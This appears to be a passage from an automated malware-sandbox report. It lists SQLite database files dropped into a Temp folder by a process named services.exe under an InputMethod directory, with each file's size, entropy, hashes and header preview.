                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\XqCZVzbz0L

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\XxIZCyO2C3

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\YKVdl3qRW3

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\YhSqdRmK1g

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\Ymk9XrXgQL

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\YqJKykSve3

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\YvzNsoyEQb

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\Z7Fzb7YlPO

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\ZUGHlbB4Ta

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\ZoWvXAfQI6

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\aTdc6oAaWL

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\aZMbN1v7g9

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\anzH7SaPap

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\azqvMKSafT

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\bGM0li9c0D

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\bUg9ykqfUn

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\c48Xb5A3EC

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\dGVqJLlM1n

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\dKSedwYYn0

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\dLnvqTBj5h

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\dRErMjJl0n

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\dSWTN6jEWv

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\dU9nyPbe5O

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\dZjIYe4EOX

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\eL5pu6QxuA

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
